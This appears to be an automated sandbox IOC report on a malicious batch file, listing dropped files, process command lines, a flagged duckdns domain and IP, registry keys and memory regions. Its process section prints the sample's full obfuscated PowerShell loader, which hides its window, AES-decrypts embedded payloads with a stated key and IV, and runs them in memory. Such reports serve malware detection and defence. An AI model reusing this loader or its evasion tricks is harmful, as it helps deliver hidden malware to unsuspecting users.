IOC Report
zap.cmd

loading gif

Files

File Path
Type
Category
Malicious
zap.cmd
ASCII text, with very long lines (29358), with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_314e1f70-3e91-4a95-b30f-9d6ce19559ac\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1056.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1096.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1bzk0n.pwe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scwnrxj.flu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg0slv3m.sqh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg1oghzr.2er.ps1
ASCII text, with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\ConDrv
ASCII text, with very long lines (2153), with CRLF line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd"
malicious
C:\Windows\System32\cmd.exe
cmd /c \"set __=^&rem\
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
http://upx.sf.net
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 5 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
hjxwrm5.duckdns.org
12.202.180.134
malicious

IPs

IP
Domain
Country
Malicious
12.202.180.134
hjxwrm5.duckdns.org
United States
malicious

Registry

Path
Value
Malicious
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
ProgramId
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
FileId
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
LowerCaseLongPath
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
LongPathHash
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Name
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
OriginalFileName
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Publisher
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Version
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
BinFileVersion
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
BinaryType
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
ProductName
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
ProductVersion
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
LinkDate
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
BinProductVersion
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
AppxPackageFullName
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
AppxPackageRelativeId
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Size
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Language
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
IsOsComponent
\REGISTRY\A\{f0ac7e26-ddac-cf5d-ddfa-8582a61f62d6}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Usn
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1A8D57BB000
heap
page read and write
2528B668000
heap
page read and write
2528B6AF000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
7FFAACEA0000
trusted library allocation
page read and write
1A8D57F8000
heap
page read and write
7FFAACD62000
trusted library allocation
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
1A8D57B0000
heap
page read and write
2528B637000
heap
page read and write
2528B637000
heap
page read and write
7FFAACB80000
trusted library allocation
page read and write
7FFAACE50000
trusted library allocation
page read and write
1A8D5850000
heap
page read and write
6B19B37000
stack
page read and write
2528B662000
heap
page read and write
7FFAACF20000
trusted library allocation
page read and write
2528B684000
heap
page read and write
7FFAACD3A000
trusted library allocation
page read and write
7FFAACD70000
trusted library allocation
page execute and read and write
1A8D9410000
trusted library allocation
page read and write
7FFAACF10000
trusted library allocation
page read and write
2528B700000
heap
page read and write
2528D620000
heap
page read and write
1A8D8642000
trusted library allocation
page read and write
2528D050000
heap
page read and write
2528B65E000
heap
page read and write
7FFAACF30000
trusted library allocation
page read and write
1A8D5806000
heap
page read and write
2528B694000
heap
page read and write
1A8D7AD9000
trusted library allocation
page read and write
7FFAACF50000
trusted library allocation
page read and write
7FFAACE30000
trusted library allocation
page read and write
7FFAACD80000
trusted library allocation
page read and write
1A8D5846000
heap
page read and write
2528B660000
heap
page read and write
2528B6E5000
heap
page read and write
84EDA7C000
stack
page read and write
7FFAACE10000
trusted library allocation
page read and write
2528B6AE000
heap
page read and write
7FFAACE20000
trusted library allocation
page read and write
1A8EFA9D000
heap
page read and write
2528B6D4000
heap
page read and write
2528B7B0000
heap
page read and write
7DF4ED5C0000
trusted library allocation
page execute and read and write
1A8D56E0000
heap
page read and write
2528B600000
heap
page read and write
1A8D5720000
heap
page read and write
2528B654000
heap
page read and write
1A8EFA49000
heap
page read and write
2528B654000
heap
page read and write
1A8EF880000
heap
page execute and read and write
1A8D7490000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page execute and read and write
1A8D56B0000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
7FFAACB90000
trusted library allocation
page read and write
1A8EFA74000
heap
page read and write
84ED2FE000
unkown
page read and write
1A8EFACA000
heap
page read and write
1A8EF9F0000
heap
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
7FFAACEF0000
trusted library allocation
page read and write
7FFAACEC0000
trusted library allocation
page read and write
7FFAACE70000
trusted library allocation
page read and write
7FFAACD31000
trusted library allocation
page read and write
1A8EFA42000
heap
page read and write
2528B750000
heap
page read and write
7FFAACBAB000
trusted library allocation
page execute and read and write
2528B6D9000
heap
page read and write
7FFAACDF0000
trusted library allocation
page read and write
2528B637000
heap
page read and write
1A8D5790000
trusted library allocation
page read and write
7FFAACE80000
trusted library allocation
page read and write
7FFAACED0000
trusted library allocation
page read and write
7FFAACBDC000
trusted library allocation
page execute and read and write
1A8EF700000
heap
page read and write
6B19F7D000
stack
page read and write
1A8E777A000
trusted library allocation
page read and write
7FFAACD20000
trusted library allocation
page read and write
1A8D7530000
heap
page read and write
1A8EF711000
heap
page read and write
84ED67E000
stack
page read and write
6B19E7E000
stack
page read and write
7FFB1E3C5000
unkown
page readonly
2528B5C4000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
84ED97F000
stack
page read and write
7FFAACE40000
trusted library allocation
page read and write
7FFAACB9B000
trusted library allocation
page read and write
7FFAACF80000
trusted library allocation
page read and write
1A8D9323000
trusted library allocation
page read and write
1A8D7C3E000
trusted library allocation
page read and write
7FFAACEB0000
trusted library allocation
page read and write
2528B646000
heap
page read and write
7FFAACB83000
trusted library allocation
page execute and read and write
7FFAACC30000
trusted library allocation
page read and write
2528B694000
heap
page read and write
1A8D5770000
heap
page read and write
7FFAACDE0000
trusted library allocation
page read and write
2528B560000
heap
page read and write
7FFAACF90000
trusted library allocation
page read and write
7FFAACC36000
trusted library allocation
page read and write
1A8E776E000
trusted library allocation
page read and write
2528B60D000
heap
page read and write
2528B691000
heap
page read and write
7FFAACF70000
trusted library allocation
page read and write
1A8D55D0000
heap
page read and write
2528B684000
heap
page read and write
84ED4FD000
stack
page read and write
1A8D74C0000
trusted library allocation
page read and write
1A8EF7C5000
heap
page read and write
7FFAACE60000
trusted library allocation
page read and write
1A8D92C6000
trusted library allocation
page read and write
1A8D57A0000
heap
page readonly
84ED9FE000
stack
page read and write
84ED7F9000
stack
page read and write
2528B694000
heap
page read and write
1A8D57FA000
heap
page read and write
1A8D7050000
heap
page read and write
7FFAACE90000
trusted library allocation
page read and write
1A8E7701000
trusted library allocation
page read and write
1A8D9042000
trusted library allocation
page read and write
2528B5C0000
heap
page read and write
1A8E79F7000
trusted library allocation
page read and write
2528B7A0000
remote allocation
page read and write
1A8D7ADB000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
84ED5FF000
stack
page read and write
1A8EFA04000
heap
page read and write
1A8EF716000
heap
page read and write
84ED6F6000
stack
page read and write
7FFAACEE0000
trusted library allocation
page read and write
7FFB1E3A0000
unkown
page readonly
7FFAACBA0000
trusted library allocation
page read and write
1A8D754F000
heap
page read and write
1A8D79E5000
trusted library allocation
page read and write
1A8D5775000
heap
page read and write
1A8D92E6000
trusted library allocation
page read and write
84ED273000
stack
page read and write
7FFB1E3B6000
unkown
page readonly
1A8EF8A0000
heap
page execute and read and write
1A8D5840000
heap
page read and write
84ED47E000
stack
page read and write
1A8D58A2000
heap
page read and write
84ED87C000
stack
page read and write
2528D05B000
heap
page read and write
2528B655000
heap
page read and write
2528B667000
heap
page read and write
84EE44E000
stack
page read and write
7FFAACF60000
trusted library allocation
page read and write
84ED3FE000
stack
page read and write
2528B64D000
heap
page read and write
2528B668000
heap
page read and write
2528B7B6000
heap
page read and write
2528B480000
heap
page read and write
6B19BBE000
unkown
page read and write
1A8D76F0000
heap
page execute and read and write
6B19EFE000
stack
page read and write
2528B64D000
heap
page read and write
2528B67E000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
1A8D7701000
trusted library allocation
page read and write
7FFAACB8D000
trusted library allocation
page execute and read and write
6B1A07B000
stack
page read and write
2528B663000
heap
page read and write
84ED778000
stack
page read and write
1A8D5760000
trusted library allocation
page read and write
7FFAACB84000
trusted library allocation
page read and write
6B1A17C000
stack
page read and write
1A8D5818000
heap
page read and write
2528B67E000
heap
page read and write
7FFB1E3C2000
unkown
page readonly
1A8D5778000
heap
page read and write
6B1A1FF000
stack
page read and write
1A8D7500000
trusted library allocation
page read and write
1A8D7B78000
trusted library allocation
page read and write
84ED8FF000
stack
page read and write
1A8D7C42000
trusted library allocation
page read and write
7FFB1E3A1000
unkown
page execute read
1A8D56F0000
heap
page read and write
1A8E7710000
trusted library allocation
page read and write
2528B7A0000
remote allocation
page read and write
1A8E78C0000
trusted library allocation
page read and write
1A8D929A000
trusted library allocation
page read and write
1A8D7077000
heap
page read and write
2528B686000
heap
page read and write
1A8EF8A7000
heap
page execute and read and write
1A8D56E6000
heap
page read and write
7FFAACC3C000
trusted library allocation
page execute and read and write
1A8D56EC000
heap
page read and write
1A8D90D3000
trusted library allocation
page read and write
2528B580000
heap
page read and write
1A8EF7D5000
heap
page read and write
1A8D5802000
heap
page read and write
7FFAACF00000
trusted library allocation
page read and write
1A8E778A000
trusted library allocation
page read and write
2528B655000
heap
page read and write
7FFAACDC0000
trusted library allocation
page read and write
84ED57E000
stack
page read and write
2528B654000
heap
page read and write
2528B64F000
heap
page read and write
7FFAACF40000
trusted library allocation
page read and write
6B19FFE000
stack
page read and write
2528B6D4000
heap
page read and write
2528B64D000
heap
page read and write
7FFAACC66000
trusted library allocation
page execute and read and write
2528B662000
heap
page read and write
1A8EF768000
heap
page read and write
1A8D584D000
heap
page read and write
84ECFDE000
stack
page read and write
1A8EFA00000
heap
page read and write
1A8D78BE000
trusted library allocation
page read and write
2528D490000
heap
page read and write
7FFAACBAD000
trusted library allocation
page execute and read and write
1A8D778B000
trusted library allocation
page read and write
84ED37E000
stack
page read and write
2528B651000
heap
page read and write
2528B6DA000
heap
page read and write
2528B6D4000
heap
page read and write
2528B7A0000
remote allocation
page read and write
2528B651000
heap
page read and write
2528B64D000
heap
page read and write
There are 214 hidden memdumps, click here to show them.